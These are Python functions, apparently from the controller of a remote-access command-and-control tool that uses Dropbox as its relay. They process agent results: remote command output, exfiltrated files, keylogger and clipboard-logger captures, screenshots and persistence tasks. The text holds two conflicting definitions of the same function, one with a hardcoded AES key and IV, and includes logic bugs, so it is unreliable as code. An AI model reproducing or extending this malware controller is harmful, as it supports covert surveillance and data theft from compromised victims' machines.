def treatPushedData(self, pushedDataFilePath): # Read the pushed data result file result = Crypto.decryptData( self.dropboxHandler.readFile(pushedDataFilePath, resultFormat="bytes"), self.statusHandler.masterKey) # Error handling if result is None: print helpers.color( "\n[!] Error retrieving data pushed by the agent ID [{}]". format(agentID)) else: print result # Delete the push result file on the server self.dropboxHandler.deleteFile(pushedDataFilePath)
def treatTaskResult(self, task, taskResultFilePath): # We have a match for a pending task that has completed agentID = task['agentID'] taskID = task['id'] args = task['args'] cmd = task['cmd'] proceed = True # Read the task result file result = Crypto.decryptData( self.dropboxHandler.readFile(taskResultFilePath, resultFormat="bytes"), self.statusHandler.masterKey) # Error handling if result is None: proceed = False elif cmd != "runCLI" or cmd != "runModule": if result.startswith("ERROR"): print helpers.color( "\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]" .format(taskID, agentID, result)) proceed = False # Proceed with task result treatment if proceed: if cmd == "runCLI": #print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed".format(taskID, agentID)) #print "[{}]".format(task['cmd']) #print "" print result if cmd == "runModule": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed".format( taskID, agentID)) print "[{}]".format(task['cmd']) print "" print result elif cmd == "launchProcess": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) elif cmd == "getFile": agentFile = args[0] # Compute a local file name based on the agent file name localFile = os.path.join( cfg.defaultPath['incoming'], os.path.basename(agentFile.replace("\\", "/"))) print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color( "[*] Please wait while downloading file [{}] and saving it to [{}]" .format(result, localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write( Crypto.decryptData( self.dropboxHandler.readFile(result, resultFormat="bytes"), self.statusHandler.masterKey)) fileHandle.close() # Delete the remote file self.dropboxHandler.deleteFile(result) print helpers.color("[*] File saved [{}]".format(localFile)) elif cmd == "sendFile": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color("[*] [{}]".format(result)) elif cmd == "sleep": self.statusHandler.setAgentAttribute(agentID, "wakeUpTime", result.split(",")[1]) self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING") print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color("[*] Agent is going to sleep") elif cmd == "polling": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) elif cmd == "stop": self.statusHandler.setAgentAttribute(agentID, "status", "DEAD") self.dropboxHandler.deleteFile( self.statusHandler.getAgentAttribute( agentID, "statusFile")) self.dropboxHandler.deleteFile( self.statusHandler.getAgentAttribute( agentID, "commandFile")) print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) # Remove the task from the task list self.statusHandler.removeTask(task) # Delete the task result file on the server self.dropboxHandler.deleteFile(taskResultFilePath)
def treatTaskResult(self, task, taskResultFilePath): # We have a match for a pending task that has completed agentID = task['agentID'] taskID = task['id'] args = task['args'] cmd = task['cmd'] proceed = True # Read the task result file key = 'secret#456!23key' iv = 'Key@123Key@123fd' enc_cmdresult = self.dropboxHandler.readFile(taskResultFilePath, resultFormat="string") decodetext = base64.b64decode(enc_cmdresult) aes = AES.new(key, AES.MODE_CBC, iv) encoder = PKCS7Encoder() cipher = aes.decrypt(decodetext) result = encoder.decode(cipher) # Error handling if result is None: proceed = False elif cmd not in ['runCLI', 'runPSModule']: if result.startswith("ERROR"): print helpers.color( "\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]" .format(taskID, agentID, result)) proceed = False # Proceed with task result treatment if proceed: if cmd in ['runCLI', 'runPSModule']: print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed".format( taskID, agentID)) print "[{}]".format(task['cmd']) print "" print result elif cmd in [ 'launchProcess', 'polling', 'sendkeystrokes', 'persist' ]: print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) elif cmd == "getFile": agentFile = args[0] # Compute a local file name based on the agent file name localFile = os.path.join( cfg.defaultPath['incoming'], os.path.basename(agentFile.replace("\\", "/"))) print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color( "[*] Please wait while downloading file [{}] and saving it to [{}]" .format(result, localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write( self.dropboxHandler.readFile(result, resultFormat="string")) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) # Delete the remote file self.dropboxHandler.deleteFile(result) elif cmd == "sendFile": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color("\n[*] [{}]".format(result)) elif cmd == "sleep": self.statusHandler.setAgentAttribute(agentID, "wakeUpTime", result.split(",")[1]) self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING") print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color("[*] Agent is going to sleep") elif cmd == "keylogger": if args[0] == "stop": localFile = os.path.join(cfg.defaultPath['incoming'], "keylogger.txt") print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully" .format(taskID, agentID)) print helpers.color( "[*] Saving keylogger results to file [{}]".format( localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(result) fileHandle.close() print helpers.color( "[*] File saved [{}]".format(localFile)) else: print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) elif cmd == "clipboardlogger": if args[0] == "stop": print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully" .format(taskID, agentID)) localFile = os.path.join(cfg.defaultPath['incoming'], "clipboardlogger.txt") print helpers.color( "[*] Saving clipboard logger results to file [{}]". format(localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(result) fileHandle.close() print helpers.color( "[*] File saved [{}]".format(localFile)) else: print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) elif cmd == "screenshot": # Compute a local file name based on the agent file name localFile = os.path.join(cfg.defaultPath['incoming'], "screenshot.jpg") print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) print helpers.color( "[*] Please wait while downloading file [{}] and saving it to [{}]" .format(result, localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write( Crypto.decryptData( self.dropboxHandler.readFile(result, resultFormat="bytes"), self.statusHandler.masterKey)) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) # Delete the remote file self.dropboxHandler.deleteFile(result) elif cmd == "stop": self.statusHandler.setAgentAttribute(agentID, "status", "DEAD") self.dropboxHandler.deleteFile( self.statusHandler.getAgentAttribute( agentID, "statusFile")) self.dropboxHandler.deleteFile( self.statusHandler.getAgentAttribute( agentID, "commandFile")) print helpers.color( "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]" .format(taskID, agentID, result)) # Remove the task from the task list self.statusHandler.removeTask(task) # Delete the task result file on the server self.dropboxHandler.deleteFile(taskResultFilePath)